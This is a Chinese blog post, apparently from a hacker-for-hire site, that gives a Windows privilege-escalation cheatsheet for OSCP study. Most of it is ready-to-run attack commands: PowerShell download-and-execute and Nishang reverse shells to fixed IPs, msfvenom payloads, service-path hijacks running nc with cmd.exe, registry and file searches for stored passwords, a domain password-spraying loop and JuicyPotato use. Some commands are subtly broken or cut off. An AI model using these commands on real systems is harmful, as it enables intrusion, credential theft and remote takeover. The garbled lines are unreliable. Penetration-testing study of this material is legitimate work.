当前位置:首页 > 黑客业务 > 正文内容

windows提权基础(一)

访客4年前 (2021-04-17)黑客业务966

最近在准备OSCP的考试,将平时用到的一些方法结合网上一些方法总结为cheatsheet,便于梳理思路,后续会持续推出一些总结和利用,主要面向和我一样的初级学习者,希望能够共同进步

1.powershell使用

下载文件(类似wget):

powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe')

下载powershell的modules并导入:

powershell -c 'IEX(New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)'

用Nishang获取一个反向的Powershell:


powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19/Invoke-PowerShellTcp.ps1','C:\Users\Public\Invoke-PowersShellTcp.ps1')
?
powershell -exec bypass -c Import-Module .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443

直接下载并执行

powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(“http://192.168.56.104/Invoke-PowerShellTcp.ps1”);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443

2.其他提权姿势汇总

基本信息收集

hostname
whoami
echo %USERNAME%
net users
net users <username>
net localgroups
net group /domain
netstat -ano
netsh firewall show state

?
wmic qfe get Caption,Description,HotFixID,InstalledOn

# 计划任务查询
schtasks /query /fo LIST /v
tasklist /SVC

net start

DRIVERQUERY

PowerSploit:

Powerview.ps1-域控查询,并查看是否有其他主机的admin权限

powershell -exec bypass
import-module powerview.ps1
Find-LocalAdminAccess

寻找密码,配置文件

findstr /si password *.txt | *.xml | *.ini
dir /s *pass*==*cred*==*vnc*==*.config*
findstr /spin "password" *.*
findstr /spin "password" *.*

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

查看注册表信息

# 搜索自动登录信息:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# 搜索VNC登录信息:
reg query "HKCU\Software\ORL\WinVNC3\Password"

# 搜索putty登录会话:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# 在HKLM搜索password:
reg query HKLM /f password /t REG_SZ /s | clip

# 在HKCU搜索password:
reg query HKCU /f password /t REG_SZ /s | clip

检查端口&端口转发

netstat -ano plink.exe -l root -pw mysecretpass 192.168.1.2. -R 8080:127.0.0.1:8080

exploit suggester模块检查内核漏洞

#使用windows-exploit-suggester.py检查内核漏洞 windows-exploit-suggester.py -updatedb windows-exploit-suggester.py --database https://www.freebuf.com/articles/network/2020-10-15-mssb.xls --systeminfo systeminfo.txt

使用sherlock检查能否提权

#本地执行 c:\>powershell -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}" #从网上下载一个PowerShell脚本并执行它无需写入磁盘。它也不会导致任何配置更改。 powershell.exe -nop -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.215:8000/zzz.ps1')"

“AT”命令提权

#XP系统可用,win7版本后不支持,设置计划命令执行相应命令 # 生成一个shell msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 -f exe > shell.exe # 定时启动这个shell文件 at 13:20 /interactice shell.exe

计划任务+sc提权

#查找高权限的任务: schtasks /query /fo LIST /v # 放到linux里提取关键字: cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM # 找到upnphost这个任务,通过sc指定upnphost这个服务的路径,使用的账号等: sc config upnphost binpath="C:\Inetpub c.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe" sc config upnphost obj=".\LocalSystem" password="" sc config upnphost depend="" # 重启这个服务: wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name]

accesschk+sc提权

#首先利用meterpreter上传工具 meterpreter > upload accesschk_xp.exe c:\\xxx\\accesschk_xp.exe #检查当前用户xx具有写权限的windows服务 C:\xx>accesschk_xp.exe /accepteula -uwcqv "用户名 *" > ack.txt #找到SSDPSRV服务,对其进行检查 C:\xx>accesschk_xp.exe /accepteula -ucqv SSDPSRV #修改服务路径 C:\xx>sc config SSDPSRV binpath="c:\inetpub c.exe -nv 10.11.0.90 9090 -e cmd.exe #修改服务账户名 C:\xx>sc config SSDPSRV obj=".\LocalSystem" password="" #start="demand"——指定是必须手动启动的服务 C:\xx>sc config SSDPSRV start="demand" #启动服务监听 C:\xx>net start SSDPSRV

icacls+sc提权

# 检查服务: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ icacls “C:\Program Files\Some Folder” sc query sc query <service_name> # 生成 Payload: msfvenom -p windows/shell_reverse_tco -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe # 改变路径: sc config <service_name> binpath="C:\shell.exe" # 重启服务: shutdown /r /t 0 sc <servicename> stop & sc <servicename> start ## OR wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name]

检查AlwaysInstallElevated组策略设置

# 注册表打开AlwaysInstall Elevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated # 注册表打开AlwaysInstall Elevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated #---------------------------------------------------# #初始MSI类型的Payload: # #---------------------------------------------------# # If the bit is set then we: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=443 –f msi > shell.msi # 上传并执行: msiexec /quiet /qn /i 1.msi #----------------------------------------------------# #第二个MSI类型的Payload: # #----------------------------------------------------# # 添加用户,创建第二段payload加admin权限: net user lokii lokii /add msfvenom -p windows/exec CMD='net localgroup administrators lokii /add' -f msi > upgrade.msi

密码喷洒(Password Spraying)

# 列出用户 net user /domain > users.txt # 执行如下脚本,固定密码对组内用户进行密码喷洒 @FOR /F %n in (users.txt) DO @FOR / F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]IPC$ > NULL # 举个例子: net user /domain > DomainUsers.txt echo "Password1" >> pass.txt echo "1q2w3e4r" >> pass.txt @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\ #也可以使用powershell脚本'DomainPasswordSpray' Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password 密码

juicy-potato提权

来自3gstudent的文章

1.whoami /priv 如果开启SeImpersonate权限,juicypotato的参数可以使用-t t 如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u 如果均开启,可以选择-t * 如果均未开启,那么无法提权 2、查看RPC默认端口是否为135 如果被修改(例如为111),juicypotato的参数可以使用-n 111 3、根据操作系统选择可用的CLSID 参考列表 https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md 例如测试系统Server2012,选择CLSID为{8BC3F05E-D86B-11D0-A075-00C04FB68820} 4、选择一个系统未占用的端口作为监听端口 例如,最终参数如下: JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} 针对Juicy Potato的关键在于权限的控制,阻止攻击者获得SeImpersonate或者SeAssignPrimaryToken权限



扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://www.therlest.com/105522.html

分享给朋友:
返回列表

上一篇:网络安全策略管理技术(NSPM)探秘

下一篇:黑客找游戏漏洞,免费黑客网盗qq号码

“windows提权基础(一)” 的相关文章

什么时候立秋

很快就要到大暑了,之后的节气就是立秋,可能很多人会觉得立秋应该就会进入秋天,天气清爽舒服了,但事实不是这样的,秋天来了还有一个很让人害怕的秋老虎,那大家知道什么时候立秋以及几号立秋吗,接下来大家就随百思特小编一起了解看看~   2020立秋是几月几日 2020年...

字节承认商业化团队撤城裁员了

据晋江新闻网2021年10月19日21:00:43的最新发布,微博网友@ 爆料。   平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议!   据悉,黑客追款后来被报道了几次。猜测第六百八十八章逃港者第六百八十九章调侃第六百。相对这个账号是他的。   1.专业网赌追回...

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这 买猪肉时,根据肉的颜色、外观、气味等可以判断出肉的质量是好还是坏。优质的猪肉,脂肪白而硬,且带有香味。肉的外面往往有一层稍带干燥的膜,肉质紧密,富有弹性,手指压后凹陷处立即复原。 次鲜肉肉色较鲜肉暗,缺乏光泽,脂肪呈灰白色;表面带...

比特犬打架视频(美国巨比特犬打架视频)

阿根廷杜高。罗威拿犬。但是还是看后天的训练,起源于19世纪。 和美国斗牛犬,放出来视频喂食的时候让其他狗和她抢,比特结构的总和等等的评估最后得出的猛犬排行。比特犬、也不退梭好感动斗牛犬比特,比特犬是同体型的后中最能打架的一种犬种!比特犬.我是一个水平很低的养狗者。 卡斯罗,爱的是优美的曲线。也就是斗...

存储过程oracle(oracle财务系统)

推荐教程:甲骨文教程 本文主要介绍甲骨文中的数据转换。 1.日期转换成字符串(以2016年10月20日为例) 选择to_char(sysdate,& # 39;yyyy-mm-DD hh24:mi:ss & # 39;)strDateTime从dual-获取年-月-日:分:秒-...

西湖论剑 Flagshop 分析复现

本文首发于“合天智汇”公众号 作者:xiaoleung title: 西湖论剑 Flagshop 分析复现 date: 2020-10-13 13:12:04 tags: CTF 本文推荐实验 PWN综合练习(三) 实验:PWN综合练习(三)(合天网安实验室) CTF PWN进阶训练实...

评论列表

只影鸽屿
只影鸽屿
3年前 (2022-06-07)

.ps1”)'用Nishang获取一个反向的Powershell:powershell -c (new-object System.Net.WebClient).DownloadFile('ht

回复该评论
蓝殇几渡
蓝殇几渡
3年前 (2022-06-07)

pe/juicy-potato/blob/master/CLSID/README.md例如测试系统Server2012,选择CLSID为{8BC3F05E-D86B-11D0

回复该评论

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright Your WebSite.Some Rights Reserved.